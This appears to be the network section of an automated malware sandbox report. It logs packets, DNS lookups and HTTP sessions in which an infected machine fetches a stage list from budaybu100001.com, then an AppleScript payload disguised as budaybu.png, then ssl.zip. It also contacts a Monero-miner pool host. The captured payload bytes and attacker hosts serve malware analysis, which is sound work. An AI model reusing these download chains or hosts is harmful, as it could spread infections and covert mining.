                                Jan 15, 2021 11:00:55.389306068 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.390175104 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.390211105 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.437900066 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438005924 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438047886 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438064098 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438080072 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438116074 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438147068 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438160896 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438177109 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438190937 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438205957 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438220978 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438237906 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438251972 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438266993 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438282967 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438298941 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438313961 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.438404083 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.439209938 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.490194082 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490289927 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490338087 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490355015 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490369081 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490385056 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490401030 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490417004 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490432024 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490447998 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490463972 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490552902 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.490591049 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.490598917 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.490639925 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.490717888 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490892887 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490911007 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490947008 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490963936 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490981102 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.490994930 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.491010904 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.491025925 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.491043091 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.491204977 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.491219997 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.545466900 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.545576096 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.545591116 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.545607090 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.545623064 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.545639038 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.545653105 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.546475887 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.590195894 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590298891 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590337038 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590354919 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590369940 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590385914 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590400934 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590416908 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590431929 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590447903 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590615988 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590846062 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590862036 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590878963 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590893984 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.590909958 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.591267109 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.591305017 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.636290073 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636392117 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636435032 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636452913 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636466980 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636482000 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636497974 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636513948 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636553049 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636569023 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636584997 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636621952 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636637926 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636677027 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636691093 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636707067 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636723042 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636739016 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636753082 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636769056 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636784077 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636800051 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636814117 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636830091 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636843920 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636861086 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.636889935 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.637002945 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.637012005 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.637016058 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.637150049 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.637295008 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.637351990 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.738275051 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.740379095 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740401983 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740417957 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740432024 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740502119 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740545988 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740576029 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740591049 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740607023 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740623951 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740659952 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740675926 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740714073 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740730047 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740744114 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740760088 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740776062 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740791082 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740804911 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740820885 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740835905 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740852118 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740864992 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740880966 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.740895987 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:55.741556883 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741594076 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741600990 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741605997 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741610050 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741645098 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741719961 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741729021 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741734028 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741739035 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741744041 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741748095 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741751909 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741756916 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.741760969 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.742247105 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:55.744417906 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:00:56.006591082 MEZ80804924543.249.204.231192.168.0.50
                                Jan 15, 2021 11:00:56.006846905 MEZ492458080192.168.0.5043.249.204.231
                                Jan 15, 2021 11:01:30.583201885 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:01:30.830101013 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:01:30.830562115 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:01:30.830976963 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:01:31.078124046 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:01:31.078576088 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:01:31.596237898 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.619801044 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:01:31.620250940 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.620393038 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.643779039 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:01:31.644609928 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:01:31.645102978 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.670422077 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.694125891 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:01:31.694592953 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.700865984 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.725270987 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:01:31.725296974 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:01:31.725676060 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.725713015 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.725760937 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.729938984 MEZ4924714441192.168.0.50185.134.22.134
                                Jan 15, 2021 11:01:31.749404907 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:01:31.753674984 MEZ1444149247185.134.22.134192.168.0.50
                                Jan 15, 2021 11:02:22.041012049 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:22.288165092 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:02:22.288476944 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:31.174207926 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:31.421452999 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:02:31.421765089 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:31.697782993 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:31.944493055 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:02:31.944766045 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:42.784403086 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:02:42.784738064 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:43.433638096 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:02:43.433976889 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:44.473925114 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:02:44.720772982 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:02:44.721092939 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:08.855804920 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:09.103111029 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:09.103444099 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:28.516860962 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:28.517226934 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:29.914108038 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:29.914405107 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:30.056433916 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:30.562458038 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:30.595554113 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:30.965317011 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:30.965632915 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:31.066112041 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:31.066416979 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:31.118747950 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:31.118768930 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:32.247040987 MEZ492468888192.168.0.5043.249.204.231
                                Jan 15, 2021 11:03:32.493738890 MEZ88884924643.249.204.231192.168.0.50
                                Jan 15, 2021 11:03:32.494052887 MEZ492468888192.168.0.5043.249.204.231

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 15, 2021 11:00:44.280405045 MEZ5160953192.168.0.508.8.8.8
                                Jan 15, 2021 11:00:44.305856943 MEZ53516098.8.8.8192.168.0.50
                                Jan 15, 2021 11:00:44.455507040 MEZ6024753192.168.0.508.8.8.8
                                Jan 15, 2021 11:00:44.480742931 MEZ53602478.8.8.8192.168.0.50
                                Jan 15, 2021 11:00:45.049896955 MEZ5506953192.168.0.508.8.8.8
                                Jan 15, 2021 11:00:45.075011015 MEZ53550698.8.8.8192.168.0.50
                                Jan 15, 2021 11:01:31.569231987 MEZ6004353192.168.0.508.8.8.8
                                Jan 15, 2021 11:01:31.594681025 MEZ53600438.8.8.8192.168.0.50

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Jan 15, 2021 11:00:44.455507040 MEZ192.168.0.508.8.8.80x3812Standard query (0)www.budaybu100001.comA (IP address)IN (0x0001)
                                Jan 15, 2021 11:00:45.049896955 MEZ192.168.0.508.8.8.80xbd24Standard query (0)budaybu.comA (IP address)IN (0x0001)
                                Jan 15, 2021 11:01:31.569231987 MEZ192.168.0.508.8.8.80x6f8Standard query (0)donate.xmr-stak.netA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Jan 15, 2021 11:00:44.480742931 MEZ8.8.8.8192.168.0.500x3812No error (0)www.budaybu100001.combudaybu100001.comCNAME (Canonical name)IN (0x0001)
                                Jan 15, 2021 11:00:44.480742931 MEZ8.8.8.8192.168.0.500x3812No error (0)budaybu100001.com43.249.204.231A (IP address)IN (0x0001)
                                Jan 15, 2021 11:00:45.075011015 MEZ8.8.8.8192.168.0.500xbd24No error (0)budaybu.com43.249.204.231A (IP address)IN (0x0001)
                                Jan 15, 2021 11:01:31.594681025 MEZ8.8.8.8192.168.0.500x6f8No error (0)donate.xmr-stak.net185.134.22.134A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.budaybu100001.com:8080
                                • budaybu.com:8080

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination Port
                                0192.168.0.504924343.249.204.2318080
                                TimestampkBytes transferredDirectionData
                                Jan 15, 2021 11:00:44.770548105 MEZ1OUTGET / HTTP/1.1
                                Host: www.budaybu100001.com:8080
                                User-Agent: curl/7.54.0
                                Accept: */*
                                Jan 15, 2021 11:00:45.019665956 MEZ2INHTTP/1.1 200 OK
                                Cache-Control: private
                                Content-Length: 95
                                Content-Type: text/html
                                Server: Microsoft-IIS/7.5
                                Set-Cookie: ASPSESSIONIDQCDARDRQ=CGPOPHEAHMJFJMBMDBBOMPNB; path=/
                                X-Powered-By: ASP.NET
                                Date: Fri, 15 Jan 2021 10:00:42 GMT
                                Data Raw: 2d 3d 2d 3d 2d 3d 68 74 74 70 3a 2f 2f 62 75 64 61 79 62 75 2e 63 6f 6d 3a 38 30 38 30 2f 62 75 64 61 79 62 75 2e 70 6e 67 2d 3d 2d 3d 2d 3d 20 2d 2b 2d 2b 2d 2b 68 74 74 70 3a 2f 2f 6f 6e 64 61 79 6f 6e 2e 63 6f 6d 3a 38 30 38 30 2f 6f 6e 64 61 79 6f 6e 2e 70 6e 67 2d 2b 2d 2b 2d 2b
                                Data Ascii: -=-=-=http://budaybu.com:8080/budaybu.png-=-=-= -+-+-+http://ondayon.com:8080/ondayon.png-+-+-+


                                Session IDSource IPSource PortDestination IPDestination Port
                                1192.168.0.504924443.249.204.2318080
                                TimestampkBytes transferredDirectionData
                                Jan 15, 2021 11:00:45.343494892 MEZ3OUTGET /budaybu.png HTTP/1.1
                                Host: budaybu.com:8080
                                User-Agent: curl/7.54.0
                                Accept: */*
                                Jan 15, 2021 11:00:45.605809927 MEZ4INHTTP/1.1 200 OK
                                Content-Type: image/png
                                Last-Modified: Thu, 23 Jan 2020 07:25:02 GMT
                                Accept-Ranges: bytes
                                ETag: "05bbd39bed1d51:0"
                                Server: Microsoft-IIS/7.5
                                X-Powered-By: ASP.NET
                                Date: Fri, 15 Jan 2021 10:00:42 GMT
                                Content-Length: 6488
                                Data Raw: 46 61 73 64 55 41 53 20 31 2e 31 30 31 2e 31 30 0e 00 00 00 04 0f ff ff ff fe 00 01 00 02 01 ff ff 00 00 01 ff fe 00 00 0e 00 01 00 00 0f 10 00 02 00 06 ff fd 00 03 00 04 00 05 00 06 00 07 01 ff fd 00 00 10 00 03 00 04 ff fc ff fb ff fa ff f9 0b ff fc 00 05 30 00 01 65 00 00 0b ff fb 00 05 30 00 01 64 00 00 0b ff fa 00 0e 30 00 05 66 69 6c 65 65 00 05 66 69 6c 65 45 0a ff f9 00 18 2e 61 65 76 74 6f 61 70 70 6e 75 6c 6c 00 00 80 00 00 00 90 00 2a 2a 2a 2a 0e 00 04 00 07 10 ff f8 ff f7 ff f6 ff f5 00 08 00 09 ff f4 0b ff f8 00 05 30 00 01 65 00 00 01 ff f7 00 00 0e ff f6 00 02 04 ff f3 00 0a 03 ff f3 00 01 0e 00 0a 00 01 00 ff f2 0b ff f2 00 06 30 00 02 5f 73 00 00 02 ff f5 00 00 10 00 08 00 03 ff f1 ff f0 ff ef 0b ff f1 00 06 30 00 02 5f 73 00 00 0b ff f0 00 05 30 00 01 78 00 00 0b ff ef 00 05 30 00 01 63 00 00 10 00 09 00 08 ff ee ff ed ff ec ff eb ff ea ff e9 ff e8 ff e7 0a ff ee 00 04 0a 49 44 20 20 0a ff ed 00 04 0a 6b 6f 63 6c 0a ff ec 00 04 0a 63 6f 62 6a 0a ff eb 00 18 2e 63 6f 72 65 63 6e 74 65 2a 2a 2a 2a 00 00 00 00 00 00 10 00 2a 2a 2a 2a 03 ff ea 00 64 0a ff e9 00 04 0a 70 63 6e 74 0a ff e8 00 04 0a 54 45 58 54 0a ff e7 00 08 0b 6b 66 72 6d 49 44 20 20 11 ff f4 00 2b a0 e0 2c 45 b1 4f 17 00 1b a1 5b e1 e2 6c 0c 00 03 6b 68 1b 00 02 a2 e4 1e a2 e5 2c 46 5b 4f 59 ff f3 4f 2a e6 a1 e7 30 45 0f 0f 0e 00 05 00 07 10 ff e6 ff e5 ff e4 ff e3 00 0b 00 0c ff e2 0b ff e6 00 05 30 00 01 64 00 00 01 ff e5 00 00 0e ff e4 00 02 04 ff e1 00 0d 03 ff e1 00 01 0e 00 0d 00 01 00 ff e0 0b ff e0 00 06 30 00 02 5f 73 00 00 02 ff e3 00 00 10 00 0b 00 03 ff df ff de ff dd 0b ff df 00 06 30 00 02 5f 73 00 00 0b ff de 00 05 30 00 01 78 00 00 0b ff dd 00 05 30 00 01 63 00 00 10 00 0c 00 08 ff dc ff db ff da ff d9 ff d8 ff d7 ff d6 ff d5 0a ff dc 00 04 0a 49 44 20 20 0a ff db 00 04 0a 6b 6f 63 6c 0a ff da 00 04 0a 63 6f 62 6a 0a ff d9 00 18 2e 63 6f 72 65 63 6e 74 65 2a 2a 2a 2a 00 00 00 00 00 00 10 00 2a 2a 2a 2a 03 ff d8 00 64 0a ff d7 00 04 0a 70 63 6e 74 0a ff d6 00 04 0a 54 45 58 54 0a ff d5 00 08 0b 6b 66 72 6d 49 44 20 20 11 ff e2 00 2b a0 e0 2c 45 b1 4f 17 00 1b a1 5b e1 e2 6c 0c 00 03 6b 68 1b 00 02 a2 e4 1f a2 e5 2c 46 5b 4f 59 ff f3 4f 2a e6 a1 e7 30 45 0f 0f 0e 00 06 00 07 10 ff d4 ff d3 ff d2 ff d1 00 0e 00 0f ff d0 0b ff d4 00 0e 30 00 05 66 69 6c 65 65 00 05 66 69 6c 65 45 01 ff d3 00 00 0e ff d2 00 02 04 ff cf 00 10 03 ff cf 00 01 0e 00 10 00 01 00 ff ce 0b ff ce 00 06 30 00 02 5f 73 00 00 02 ff d1 00 00 10 00 0e 00 01 ff cd 0b ff cd 00 06 30 00 02 5f 73 00 00 10 00 0f 00 06 00 11 00 12 ff cc ff cb ff ca ff c9 0e 00 11 00 01 b1 00 13 11 00 13 00 0a 00 5b 00 20 00 2d 00 65 00 20 0e 00 12 00 01 b1 00 14 11 00 14 00 3a 00 20 00 5d 00 20 00 26 00 26 00 20 00 65 00 63 00 68 00 6f 00 20 00 74 00 72 00 75 00 65 00 20 00 7c 00 7c 00 20 00 65 00 63 00 68 00 6f 00 20 00 66 00 61 00 6c 00 73 00 65 0a ff cc 00 18 2e 73 79 73 6f 65 78 65 63 54 45 58 54 ff ff 80 00 00 00 00 00 54 45 58 54 0a ff cb 00 04 0a 62 6f 6f 6c 01 ff ca 00 00 02 ff c9 00 00 11 ff d0 00 1a 14 00 11 e0 a0 25 e1 25 6a 0c 00 02 e3 26 0f 57 00 09 58 00 04 00 05 66 0f 0f 0e 00 07 00 07 10 ff c8 ff c7 ff c6 ff c5 00 15 00 16 ff c4 0a ff c8 00 18 2e 61 65 76 74 6f 61 70 70 6e 75 6c 6c 00 00 80 00 00 00 90 00 2a 2a 2a 2a 01 ff c7 00 00 01 ff c6 00 00 02 ff c5 00 00 10 00 15 00 00 10 00
                                Data Ascii: FasdUAS 1.101.100e0d0fileefileE.aevtoappnull****0e0_s0_s0x0cID koclcobj.corecnte********dpcntTEXTkfrmID +,EO[lkh,F[OYO*0E0d0_s0_s0x0cID koclcobj.corecnte********dpcntTEXTkfrmID +,EO[lkh,F[OYO*0E0fileefileE0_s0_s[ -e : ] && echo true || echo false.sysoexecTEXTTEXTbool%%j&WXf.aevtoappnull****


                                Session IDSource IPSource PortDestination IPDestination Port
                                2192.168.0.504924543.249.204.2318080
                                TimestampkBytes transferredDirectionData
                                Jan 15, 2021 11:00:51.024009943 MEZ10OUTGET /ssl.zip HTTP/1.1
                                Host: budaybu.com:8080
                                User-Agent: curl/7.54.0
                                Accept: */*
                                Jan 15, 2021 11:00:51.287779093 MEZ12INHTTP/1.1 200 OK
                                Content-Type: application/x-zip-compressed
                                Last-Modified: Thu, 23 Jan 2020 07:29:43 GMT
                                Accept-Ranges: bytes
                                ETag: "f0a08ee1bed1d51:0"
                                Server: Microsoft-IIS/7.5
                                X-Powered-By: ASP.NET
                                Date: Fri, 15 Jan 2021 10:00:49 GMT
                                Content-Length: 1629446
